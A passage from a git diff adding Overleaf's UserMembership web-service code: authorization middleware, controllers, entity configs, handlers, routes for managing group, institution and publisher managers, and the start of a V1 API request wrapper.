req.user.staffAccess[requiredStaffAccess] + ) + } + }, + + hasEntityAccess() { + return req => { + if (!req.entity) { + return false + } + const fieldAccess = req.entity[req.entityConfig.fields.access] + const fieldAccessArray = Array.isArray(fieldAccess) + ? fieldAccess + : [fieldAccess.toString()] + return fieldAccessArray.some( + accessUserId => accessUserId.toString() === req.user._id.toString() + ) + } + }, +} +module.exports = UserMembershipAuthorization diff --git a/services/web/app/src/Features/UserMembership/UserMembershipController.mjs b/services/web/app/src/Features/UserMembership/UserMembershipController.mjs new file mode 100644 index 0000000..aaa8fa5 --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipController.mjs @@ -0,0 +1,244 @@ +import SessionManager from '../Authentication/SessionManager.js' +import UserMembershipHandler from './UserMembershipHandler.js' +import Errors from '../Errors/Errors.js' +import EmailHelper from '../Helpers/EmailHelper.js' +import { csvAttachment } from '../../infrastructure/Response.js' +import { + UserIsManagerError, + UserAlreadyAddedError, + UserNotFoundError, +} from './UserMembershipErrors.js' +import { SSOConfig } from '../../models/SSOConfig.js' +import { Parser as CSVParser } from 'json2csv' +import { expressify } from '@overleaf/promise-utils' +import PlansLocator from '../Subscription/PlansLocator.js' +import RecurlyClient from '../Subscription/RecurlyClient.js' + +async function manageGroupMembers(req, res, next) { + const { entity: subscription, entityConfig } = req + + const entityPrimaryKey = + subscription[entityConfig.fields.primaryKey].toString() + + let entityName + if (entityConfig.fields.name) { + entityName = subscription[entityConfig.fields.name] + } + + const users = await UserMembershipHandler.promises.getUsers( + subscription, + entityConfig + ) + const ssoConfig = await SSOConfig.findById(subscription.ssoConfig).exec() + const plan = PlansLocator.findLocalPlanInSettings(subscription.planCode) + const userId = SessionManager.getLoggedInUserId(req.session) + const isAdmin = subscription.admin_id.toString() === userId + const recurlySubscription = subscription.recurlySubscription_id + ? await RecurlyClient.promises.getSubscription( + subscription.recurlySubscription_id + ) + : undefined + + const canUseAddSeatsFeature = + plan?.canUseFlexibleLicensing && + isAdmin && + recurlySubscription && + !recurlySubscription.pendingChange + + res.render('user_membership/group-members-react', { + name: entityName, + groupId: entityPrimaryKey, + users, + groupSize: subscription.membersLimit, + managedUsersActive: subscription.managedUsersEnabled, + groupSSOActive: ssoConfig?.enabled, + canUseFlexibleLicensing: plan?.canUseFlexibleLicensing, + canUseAddSeatsFeature, + }) +} + +async function manageGroupManagers(req, res, next) { + await _renderManagersPage( + req, + res, + next, + 'user_membership/group-managers-react' + ) +} + +async function manageInstitutionManagers(req, res, next) { + await _renderManagersPage( + req, + res, + next, + 'user_membership/institution-managers-react' + ) +} + +async function managePublisherManagers(req, res, next) { + await _renderManagersPage( + req, + res, + next, + 'user_membership/publisher-managers-react' + ) +} + +async function _renderManagersPage(req, res, next, template) { + const { entity, entityConfig } = req + + const fetchV1Data = new Promise((resolve, reject) => { + entity.fetchV1Data((error, entity) => { + if (error) { + reject(error) + } else { + resolve(entity) + } + }) + }) + + const entityWithV1Data = await fetchV1Data + + const entityPrimaryKey = + entityWithV1Data[entityConfig.fields.primaryKey].toString() + let entityName + if (entityConfig.fields.name) { + entityName = entityWithV1Data[entityConfig.fields.name] + } + const users = await UserMembershipHandler.promises.getUsers( + entityWithV1Data, + entityConfig + ) + + res.render(template, { + name: entityName, + users, + groupId: entityPrimaryKey, + }) +} + +export default { + manageGroupMembers: expressify(manageGroupMembers), + manageGroupManagers: expressify(manageGroupManagers), + manageInstitutionManagers: expressify(manageInstitutionManagers), + managePublisherManagers: expressify(managePublisherManagers), + add(req, res, next) { + const { entity, entityConfig } = req + const email = EmailHelper.parseEmail(req.body.email) + if (email == null) { + return res.status(400).json({ + error: { + code: 'invalid_email', + message: req.i18n.translate('invalid_email'), + }, + }) + } + + if (entityConfig.readOnly) { + return next(new Errors.NotFoundError('Cannot add users to entity')) + } + + UserMembershipHandler.addUser( + entity, + entityConfig, + email, + function (error, user) { + if (error && error instanceof UserAlreadyAddedError) { + return res.status(400).json({ + error: { + code: 'user_already_added', + message: req.i18n.translate('user_already_added'), + }, + }) + } + if (error && error instanceof UserNotFoundError) { + return res.status(404).json({ + error: { + code: 'user_not_found', + message: req.i18n.translate('user_not_found'), + }, + }) + } + if (error != null) { + return next(error) + } + res.json({ user }) + } + ) + }, + remove(req, res, next) { + const { entity, entityConfig } = req + const { userId } = req.params + + if (entityConfig.readOnly) { + return next(new Errors.NotFoundError('Cannot remove users from entity')) + } + + const loggedInUserId = SessionManager.getLoggedInUserId(req.session) + if (loggedInUserId === userId) { + return res.status(400).json({ + error: { + code: 'managers_cannot_remove_self', + message: req.i18n.translate('managers_cannot_remove_self'), + }, + }) + } + + UserMembershipHandler.removeUser( + entity, + entityConfig, + userId, + function (error, user) { + if (error && error instanceof UserIsManagerError) { + return res.status(400).json({ + error: { + code: 'managers_cannot_remove_admin', + message: req.i18n.translate('managers_cannot_remove_admin'), + }, + }) + } + if (error != null) { + return next(error) + } + res.sendStatus(200) + } + ) + }, + exportCsv(req, res, next) { + const { entity, entityConfig } = req + const fields = ['email', 'last_logged_in_at', 'last_active_at'] + + UserMembershipHandler.getUsers( + entity, + entityConfig, + function (error, users) { + if (error != null) { + return next(error) + } + const csvParser = new CSVParser({ fields }) + csvAttachment(res, csvParser.parse(users), 'Group.csv') + } + ) + }, + new(req, res, next) { + res.render('user_membership/new', { + entityName: req.params.name, + entityId: req.params.id, + }) + }, + create(req, res, next) { + const entityId = req.params.id + const entityConfig = req.entityConfig + + UserMembershipHandler.createEntity( + entityId, + entityConfig, + function (error, entity) { + if (error != null) { + return next(error) + } + res.redirect(entityConfig.pathsFor(entityId).index) + } + ) + }, +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipEntityConfigs.js b/services/web/app/src/Features/UserMembership/UserMembershipEntityConfigs.js new file mode 100644 index 0000000..c65f38e --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipEntityConfigs.js @@ -0,0 +1,111 @@ +module.exports = { + group: { + modelName: 'Subscription', + readOnly: true, + hasMembersLimit: true, + fields: { + primaryKey: '_id', + read: ['invited_emails', 'teamInvites', 'member_ids'], + write: null, + access: 'manager_ids', + membership: 'member_ids', + name: 'teamName', + }, + baseQuery: { + groupPlan: true, + }, + }, + + team: { + // for metrics only + modelName: 'Subscription', + fields: { + primaryKey: 'overleaf.id', + access: 'manager_ids', + }, + baseQuery: { + groupPlan: true, + }, + }, + + groupManagers: { + modelName: 'Subscription', + fields: { + primaryKey: '_id', + read: ['manager_ids'], + write: 'manager_ids', + access: 'manager_ids', + membership: 'member_ids', + name: 'teamName', + }, + baseQuery: { + groupPlan: true, + }, + }, + + groupMember: { + modelName: 'Subscription', + readOnly: true, + hasMembersLimit: true, + fields: { + primaryKey: '_id', + read: ['member_ids'], + write: null, + access: 'member_ids', + membership: 'member_ids', + name: 'teamName', + }, + baseQuery: { + groupPlan: true, + }, + }, + + groupAdmin: { + modelName: 'Subscription', + fields: { + primaryKey: '_id', + read: ['admin_id'], + write: null, + access: 'admin_id', + membership: 'admin_id', + name: 'teamName', + }, + baseQuery: { + groupPlan: true, + }, + }, + + institution: { + modelName: 'Institution', + fields: { + primaryKey: 'v1Id', + read: ['managerIds'], + write: 'managerIds', + access: 'managerIds', + membership: 'member_ids', + name: 'name', + }, + pathsFor(id) { + return { + index: `/manage/institutions/${id}/managers`, + } + }, + }, + + publisher: { + modelName: 'Publisher', + fields: { + primaryKey: 'slug', + read: ['managerIds'], + write: 'managerIds', + access: 'managerIds', + membership: 'member_ids', + name: 'name', + }, + pathsFor(id) { + return { + index: `/manage/publishers/${id}/managers`, + } + }, + }, +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipErrors.js b/services/web/app/src/Features/UserMembership/UserMembershipErrors.js new file mode 100644 index 0000000..6667ced --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipErrors.js @@ -0,0 +1,11 @@ +const OError = require('@overleaf/o-error') + +class UserIsManagerError extends OError {} +class UserNotFoundError extends OError {} +class UserAlreadyAddedError extends OError {} + +module.exports = { + UserIsManagerError, + UserNotFoundError, + UserAlreadyAddedError, +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipHandler.js b/services/web/app/src/Features/UserMembership/UserMembershipHandler.js new file mode 100644 index 0000000..0632f6e --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipHandler.js @@ -0,0 +1,120 @@ +const { ObjectId } = require('mongodb-legacy') +const { promisifyAll, callbackify } = require('@overleaf/promise-utils') +const EntityModels = { + Institution: require('../../models/Institution').Institution, + Subscription: require('../../models/Subscription').Subscription, + Publisher: require('../../models/Publisher').Publisher, +} +const UserMembershipViewModel = require('./UserMembershipViewModel') +const UserGetter = require('../User/UserGetter') +const { + UserIsManagerError, + UserNotFoundError, + UserAlreadyAddedError, +} = require('./UserMembershipErrors') + +const UserMembershipHandler = { + async getEntityWithoutAuthorizationCheck(entityId, entityConfig) { + const query = buildEntityQuery(entityId, entityConfig) + return await EntityModels[entityConfig.modelName].findOne(query).exec() + }, + + async createEntity(entityId, entityConfig) { + const data = buildEntityQuery(entityId, entityConfig) + return await EntityModels[entityConfig.modelName].create(data) + }, + + async getUsers(entity, entityConfig) { + const attributes = entityConfig.fields.read + return await getPopulatedListOfMembers(entity, attributes) + }, + + async addUser(entity, entityConfig, email) { + const attribute = entityConfig.fields.write + const user = await UserGetter.promises.getUserByAnyEmail(email) + + if (!user) { + throw new UserNotFoundError() + } + + if (entity[attribute].some(managerId => managerId.equals(user._id))) { + throw new UserAlreadyAddedError() + } + + await addUserToEntity(entity, attribute, user) + return UserMembershipViewModel.build(user) + }, + + async removeUser(entity, entityConfig, userId) { + const attribute = entityConfig.fields.write + if (entity.admin_id ? entity.admin_id.equals(userId) : undefined) { + throw new UserIsManagerError() + } + return await removeUserFromEntity(entity, attribute, userId) + }, +} + +UserMembershipHandler.promises = promisifyAll(UserMembershipHandler) +module.exports = { + getEntityWithoutAuthorizationCheck: callbackify( + UserMembershipHandler.getEntityWithoutAuthorizationCheck + ), + createEntity: callbackify(UserMembershipHandler.createEntity), + getUsers: callbackify(UserMembershipHandler.getUsers), + addUser: callbackify(UserMembershipHandler.addUser), + removeUser: callbackify(UserMembershipHandler.removeUser), + promises: UserMembershipHandler, +} + +async function getPopulatedListOfMembers(entity, attributes) { + const userObjects = [] + + for (const attribute of attributes) { + for (const userObject of entity[attribute] || []) { + // userObject can be an email as String, a user id as ObjectId or an + // invite as Object with an email attribute as String. We want to pass to + // UserMembershipViewModel either an email as (String) or a user id (ObjectId) + const userIdOrEmail = userObject.email || userObject + userObjects.push(userIdOrEmail) + } + } + + const users = await Promise.all( + userObjects.map(userObject => + UserMembershipViewModel.promises.buildAsync(userObject) + ) + ) + + for (const user of users) { + if ( + user?._id && + entity?.admin_id && + user._id.toString() === entity.admin_id.toString() + ) { + user.isEntityAdmin = true + } + } + + return users +} + +async function addUserToEntity(entity, attribute, user) { + const fieldUpdate = {} + fieldUpdate[attribute] = user._id + return await entity.updateOne({ $addToSet: fieldUpdate }).exec() +} + +async function removeUserFromEntity(entity, attribute, userId) { + const fieldUpdate = {} + fieldUpdate[attribute] = userId + return await entity.updateOne({ $pull: fieldUpdate }).exec() +} + +function buildEntityQuery(entityId, entityConfig) { + if (ObjectId.isValid(entityId.toString())) { + entityId = new ObjectId(entityId) + } + const query = Object.assign({}, entityConfig.baseQuery) + query[entityConfig.fields.primaryKey] = entityId + return query +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipMiddleware.js b/services/web/app/src/Features/UserMembership/UserMembershipMiddleware.js new file mode 100644 index 0000000..f125496 --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipMiddleware.js @@ -0,0 +1,334 @@ +const { expressify } = require('@overleaf/promise-utils') +const async = require('async') +const UserMembershipAuthorization = require('./UserMembershipAuthorization') +const AuthenticationController = require('../Authentication/AuthenticationController') +const UserMembershipHandler = require('./UserMembershipHandler') +const EntityConfigs = require('./UserMembershipEntityConfigs') +const Errors = require('../Errors/Errors') +const HttpErrorHandler = require('../Errors/HttpErrorHandler') +const TemplatesManager = require('../Templates/TemplatesManager') + +// set of middleware arrays or functions that checks user access to an entity +// (publisher, institution, group, template, etc.) +const UserMembershipMiddleware = { + requireTeamMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('team'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('groupMetrics'), + ]), + ], + + requireGroup: [fetchEntityConfig('group'), fetchEntity(), requireEntity()], + + requireGroupAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('group'), + fetchEntity(), + requireEntity(), + ], + + requireGroupMemberAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('groupMember'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([UserMembershipAuthorization.hasEntityAccess()]), + ], + + requireGroupManagementAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('group'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('groupManagement'), + ]), + ], + + requireGroupMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('group'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('groupMetrics'), + ]), + ], + + requireGroupManagersManagementAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('groupManagers'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('groupManagement'), + ]), + ], + + requireGroupAdminAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('groupAdmin'), + fetchEntity(), + requireEntity(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('groupManagement'), + ]), + ], + + requireInstitutionMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('institution'), + fetchEntity(), + requireEntityOrCreate('institutionManagement'), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('institutionMetrics'), + ]), + ], + + requireInstitutionManagementAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('institution'), + fetchEntity(), + requireEntityOrCreate('institutionManagement'), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('institutionManagement'), + ]), + ], + + requireInstitutionManagementStaffAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('institutionManagement'), + ]), + fetchEntityConfig('institution'), + fetchEntity(), + requireEntityOrCreate('institutionManagement'), + ], + + requirePublisherMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('publisher'), + fetchEntity(), + requireEntityOrCreate('publisherManagement'), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('publisherMetrics'), + ]), + ], + + requirePublisherManagementAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('publisher'), + fetchEntity(), + requireEntityOrCreate('publisherManagement'), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('publisherManagement'), + ]), + ], + + requireConversionMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchEntityConfig('publisher'), + fetchEntity(), + requireEntityOrCreate('publisherManagement'), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('publisherMetrics'), + ]), + ], + + requireAdminMetricsAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('adminMetrics'), + ]), + ], + + requireTemplateMetricsAccess: [ + AuthenticationController.requireLogin(), + fetchV1Template(), + requireV1Template(), + fetchEntityConfig('publisher'), + fetchPublisherFromTemplate(), + allowAccessIfAny([ + UserMembershipAuthorization.hasEntityAccess(), + UserMembershipAuthorization.hasStaffAccess('publisherMetrics'), + ]), + ], + + requirePublisherCreationAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('publisherManagement'), + ]), + fetchEntityConfig('publisher'), + ], + + requireInstitutionCreationAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('institutionManagement'), + ]), + fetchEntityConfig('institution'), + ], + + requireSplitTestMetricsAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('splitTestMetrics'), + UserMembershipAuthorization.hasStaffAccess('splitTestManagement'), + ]), + ], + + requireSplitTestManagementAccess: [ + AuthenticationController.requireLogin(), + allowAccessIfAny([ + UserMembershipAuthorization.hasStaffAccess('splitTestManagement'), + ]), + ], + + // graphs access is an edge-case: + // - the entity id is in `req.query.resource_id`. It must be set as + // `req.params.id` + // - the entity name is in `req.query.resource_type` and is used to find the + // require middleware depending on the entity name + requireGraphAccess(req, res, next) { + req.params.id = req.query.resource_id + let entityName = req.query.resource_type + if (!entityName) { + return HttpErrorHandler.notFound(req, res, 'resource_type param missing') + } + entityName = entityName.charAt(0).toUpperCase() + entityName.slice(1) + + const middleware = + UserMembershipMiddleware[`require${entityName}MetricsAccess`] + if (!middleware) { + return HttpErrorHandler.notFound( + req, + res, + `incorrect entity name: ${entityName}` + ) + } + // run the list of middleware functions in series. This is essencially + // a poor man's middleware runner + async.eachSeries(middleware, (fn, callback) => fn(req, res, callback), next) + }, +} + +module.exports = UserMembershipMiddleware + +// fetch entity config and set it in the request +function fetchEntityConfig(entityName) { + return (req, res, next) => { + const entityConfig = EntityConfigs[entityName] + req.entityName = entityName + req.entityConfig = entityConfig + next() + } +} + +// fetch the entity with id and config, and set it in the request +function fetchEntity() { + return expressify(async (req, res, next) => { + req.entity = + await UserMembershipHandler.promises.getEntityWithoutAuthorizationCheck( + req.params.id, + req.entityConfig + ) + next() + }) +} + +function fetchPublisherFromTemplate() { + return (req, res, next) => { + if (req.template.brand.slug) { + // set the id as the publisher's id as it's the entity used for access + // control + req.params.id = req.template.brand.slug + return fetchEntity()(req, res, next) + } else { + return next() + } + } +} + +// ensure an entity was found, or fail with 404 +function requireEntity() { + return (req, res, next) => { + if (req.entity) { + return next() + } + + throw new Errors.NotFoundError( + `no '${req.entityName}' entity with '${req.params.id}'` + ) + } +} + +// ensure an entity was found or redirect to entity creation page if the user +// has permissions to create the entity, or fail with 404 +function requireEntityOrCreate(creationStaffAccess) { + return (req, res, next) => { + if (req.entity) { + return next() + } + + if (UserMembershipAuthorization.hasStaffAccess(creationStaffAccess)(req)) { + res.redirect(`/entities/${req.entityName}/create/${req.params.id}`) + return + } + + throw new Errors.NotFoundError( + `no '${req.entityName}' entity with '${req.params.id}'` + ) + } +} + +// fetch the template from v1, and set it in the request +function fetchV1Template() { + return expressify(async (req, res, next) => { + const templateId = req.params.id + const body = await TemplatesManager.promises.fetchFromV1(templateId) + req.template = { + id: body.id, + title: body.title, + brand: body.brand, + } + next() + }) +} + +// ensure a template was found, or fail with 404 +function requireV1Template() { + return (req, res, next) => { + if (req.template.id) { + return next() + } + + throw new Errors.NotFoundError('no template found') + } +} + +// run a serie of synchronous access functions and call `next` if any of the +// retur values is truly. Redirect to restricted otherwise +function allowAccessIfAny(accessFunctions) { + return (req, res, next) => { + for (const accessFunction of accessFunctions) { + if (accessFunction(req)) { + return next() + } + } + HttpErrorHandler.forbidden(req, res) + } +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipRouter.mjs b/services/web/app/src/Features/UserMembership/UserMembershipRouter.mjs new file mode 100644 index 0000000..7013b1c --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipRouter.mjs @@ -0,0 +1,131 @@ +import UserMembershipMiddleware from './UserMembershipMiddleware.js' +import UserMembershipController from './UserMembershipController.mjs' +import SubscriptionGroupController from '../Subscription/SubscriptionGroupController.mjs' +import TeamInvitesController from '../Subscription/TeamInvitesController.mjs' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' + +const rateLimiters = { + createTeamInvite: new RateLimiter('create-team-invite', { + points: 200, + duration: 60, + }), + exportTeamCsv: new RateLimiter('export-team-csv', { + points: 30, + duration: 60, + }), +} + +export default { + apply(webRouter) { + // group members routes + webRouter.get( + '/manage/groups/:id/members', + UserMembershipMiddleware.requireGroupManagementAccess, + UserMembershipController.manageGroupMembers + ) + webRouter.post( + '/manage/groups/:id/invites', + UserMembershipMiddleware.requireGroupManagementAccess, + RateLimiterMiddleware.rateLimit(rateLimiters.createTeamInvite), + TeamInvitesController.createInvite + ) + webRouter.post( + '/manage/groups/:id/resendInvite', + UserMembershipMiddleware.requireGroupManagementAccess, + RateLimiterMiddleware.rateLimit(rateLimiters.createTeamInvite), + TeamInvitesController.resendInvite + ) + webRouter.delete( + '/manage/groups/:id/user/:user_id', + UserMembershipMiddleware.requireGroupManagementAccess, + SubscriptionGroupController.removeUserFromGroup + ) + webRouter.delete( + '/manage/groups/:id/invites/:email', + UserMembershipMiddleware.requireGroupManagementAccess, + TeamInvitesController.revokeInvite + ) + webRouter.get( + '/manage/groups/:id/members/export', + UserMembershipMiddleware.requireGroupManagementAccess, + RateLimiterMiddleware.rateLimit(rateLimiters.exportTeamCsv), + UserMembershipController.exportCsv + ) + + // group managers routes + webRouter.get( + '/manage/groups/:id/managers', + UserMembershipMiddleware.requireGroupManagersManagementAccess, + UserMembershipController.manageGroupManagers + ) + webRouter.post( + '/manage/groups/:id/managers', + UserMembershipMiddleware.requireGroupManagersManagementAccess, + UserMembershipController.add + ) + webRouter.delete( + '/manage/groups/:id/managers/:userId', + UserMembershipMiddleware.requireGroupManagersManagementAccess, + UserMembershipController.remove + ) + + // institution members routes + webRouter.get( + '/manage/institutions/:id/managers', + UserMembershipMiddleware.requireInstitutionManagementAccess, + UserMembershipController.manageInstitutionManagers + ) + webRouter.post( + '/manage/institutions/:id/managers', + UserMembershipMiddleware.requireInstitutionManagementAccess, + UserMembershipController.add + ) + webRouter.delete( + '/manage/institutions/:id/managers/:userId', + UserMembershipMiddleware.requireInstitutionManagementAccess, + UserMembershipController.remove + ) + + // publisher members routes + webRouter.get( + '/manage/publishers/:id/managers', + UserMembershipMiddleware.requirePublisherManagementAccess, + UserMembershipController.managePublisherManagers + ) + webRouter.post( + '/manage/publishers/:id/managers', + UserMembershipMiddleware.requirePublisherManagementAccess, + UserMembershipController.add + ) + webRouter.delete( + '/manage/publishers/:id/managers/:userId', + UserMembershipMiddleware.requirePublisherManagementAccess, + UserMembershipController.remove + ) + + // publisher creation routes + webRouter.get( + '/entities/publisher/create/:id', + UserMembershipMiddleware.requirePublisherCreationAccess, + UserMembershipController.new + ) + webRouter.post( + '/entities/publisher/create/:id', + UserMembershipMiddleware.requirePublisherCreationAccess, + UserMembershipController.create + ) + + // institution creation routes + webRouter.get( + '/entities/institution/create/:id', + UserMembershipMiddleware.requireInstitutionCreationAccess, + UserMembershipController.new + ) + webRouter.post( + '/entities/institution/create/:id', + UserMembershipMiddleware.requireInstitutionCreationAccess, + UserMembershipController.create + ) + }, +} diff --git a/services/web/app/src/Features/UserMembership/UserMembershipViewModel.js b/services/web/app/src/Features/UserMembership/UserMembershipViewModel.js new file mode 100644 index 0000000..6c94f67 --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipViewModel.js @@ -0,0 +1,83 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const UserGetter = require('../User/UserGetter') +const { isObjectIdInstance } = require('../Helpers/Mongo') +const { promisify } = require('@overleaf/promise-utils') + +const UserMembershipViewModel = { + build(userOrEmail) { + if (userOrEmail._id) { + return buildUserViewModel(userOrEmail) + } else { + return buildUserViewModelWithEmail(userOrEmail) + } + }, + + buildAsync(userOrIdOrEmail, callback) { + if (callback == null) { + callback = function () {} + } + if (!isObjectIdInstance(userOrIdOrEmail)) { + // userOrIdOrEmail is a user or an email and can be parsed by #build + return callback(null, UserMembershipViewModel.build(userOrIdOrEmail)) + } + + const userId = userOrIdOrEmail + const projection = { + email: 1, + first_name: 1, + last_name: 1, + lastLoggedIn: 1, + lastActive: 1, + enrollment: 1, + } + return UserGetter.getUser(userId, projection, function (error, user) { + if (error != null || user == null) { + return callback(null, buildUserViewModelWithId(userId.toString())) + } + return callback(null, buildUserViewModel(user)) + }) + }, +} + +function buildUserViewModel(user, isInvite) { + if (isInvite == null) { + isInvite = false + } + return { + _id: user._id || null, + email: user.email || null, + first_name: user.first_name || null, + last_name: user.last_name || null, + last_active_at: user.lastActive || user.lastLoggedIn || null, + last_logged_in_at: user.lastLoggedIn || null, + invite: isInvite, + enrollment: user.enrollment + ? { + managedBy: user.enrollment.managedBy, + enrolledAt: user.enrollment.enrolledAt, + sso: user.enrollment.sso, + } + : undefined, + } +} + +const buildUserViewModelWithEmail = email => buildUserViewModel({ email }, true) + +const buildUserViewModelWithId = id => buildUserViewModel({ _id: id }, false) + +UserMembershipViewModel.promises = { + buildAsync: promisify(UserMembershipViewModel.buildAsync), +} + +module.exports = UserMembershipViewModel diff --git a/services/web/app/src/Features/UserMembership/UserMembershipsHandler.js b/services/web/app/src/Features/UserMembership/UserMembershipsHandler.js new file mode 100644 index 0000000..cbd12e4 --- /dev/null +++ b/services/web/app/src/Features/UserMembership/UserMembershipsHandler.js @@ -0,0 +1,83 @@ +/* eslint-disable + n/handle-callback-err, + max-len, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const async = require('async') +const { promisifyAll } = require('@overleaf/promise-utils') +const EntityModels = { + Institution: require('../../models/Institution').Institution, + Subscription: require('../../models/Subscription').Subscription, + Publisher: require('../../models/Publisher').Publisher, +} +const UserMembershipEntityConfigs = require('./UserMembershipEntityConfigs') + +const UserMembershipsHandler = { + removeUserFromAllEntities(userId, callback) { + // get all writable entity types + if (callback == null) { + callback = function () {} + } + const entityConfigs = [] + for (const key in UserMembershipEntityConfigs) { + const entityConfig = UserMembershipEntityConfigs[key] + if (entityConfig.fields && entityConfig.fields.write != null) { + entityConfigs.push(entityConfig) + } + } + + // remove the user from all entities types + async.map( + entityConfigs, + (entityConfig, innerCallback) => + UserMembershipsHandler.removeUserFromEntities( + entityConfig, + userId, + innerCallback + ), + callback + ) + }, + + removeUserFromEntities(entityConfig, userId, callback) { + if (callback == null) { + callback = function () {} + } + const removeOperation = { $pull: {} } + removeOperation.$pull[entityConfig.fields.write] = userId + EntityModels[entityConfig.modelName] + .updateMany({}, removeOperation) + .then(result => callback(null, result)) + .catch(callback) + }, + + getEntitiesByUser(entityConfig, userId, callback) { + if (callback == null) { + callback = function () {} + } + const query = Object.assign({}, entityConfig.baseQuery) + query[entityConfig.fields.access] = userId + EntityModels[entityConfig.modelName] + .find(query) + .then(entities => { + if (entities == null) { + entities = [] + } + async.mapSeries( + entities, + (entity, cb) => entity.fetchV1Data(cb), + callback + ) + }) + .catch(callback) + }, +} + +UserMembershipsHandler.promises = promisifyAll(UserMembershipsHandler) +module.exports = UserMembershipsHandler diff --git a/services/web/app/src/Features/V1/V1Api.js b/services/web/app/src/Features/V1/V1Api.js new file mode 100644 index 0000000..ce15891 --- /dev/null +++ b/services/web/app/src/Features/V1/V1Api.js @@ -0,0 +1,106 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const request = require('request') +const settings = require('@overleaf/settings') +const Errors = require('../Errors/Errors') +const { promisifyAll } = require('@overleaf/promise-utils') + +// TODO: check what happens when these settings aren't defined +const DEFAULT_V1_PARAMS = { + baseUrl: settings.apis.v1.url, + auth: { + user: settings.apis.v1.user, + pass: settings.apis.v1.pass, + }, + json: true, + timeout: settings.apis.v1.timeout, +} + +const v1Request = request.defaults(DEFAULT_V1_PARAMS) + +const DEFAULT_V1_OAUTH_PARAMS = { + baseUrl: settings.apis.v1.url, + json: true, + timeout: settings.apis.v1.timeout, +} + +const v1OauthRequest = request.defaults(DEFAULT_V1_OAUTH_PARAMS) + +const V1Api = { + request(options, callback) { + if (callback == null) { + return request(options) + } + return v1Request(options, (error, response, body) => + V1Api._responseHandler(options, error, response, body, callback) + ) + }, + + oauthRequest(options, token, callback) { + if (options.uri == null) { + return callback(new Error('uri required')) + } + if (options.method == null) { + options.method = 'GET' + } + options.auth = { bearer: token } + return v1OauthRequest(options, (error, response, body) => + V1Api._responseHandler(options, error, response, body, callback) + ) + }, + + _responseHandler(options, error, response, body, callback) { + if (error != null) { + return callback( + new Errors.V1ConnectionError('error from V1 API').withCause(error) + ) + } + if (response && response.statusCode >= 500) { + return callback( + new Errors.V1ConnectionError({ + message: 'error from V1 API', + info: { status: response.statusCode, body }, + }) + ) + } + if ( + (response && response.statusCode >= 200 && response.statusCode < 300) || + 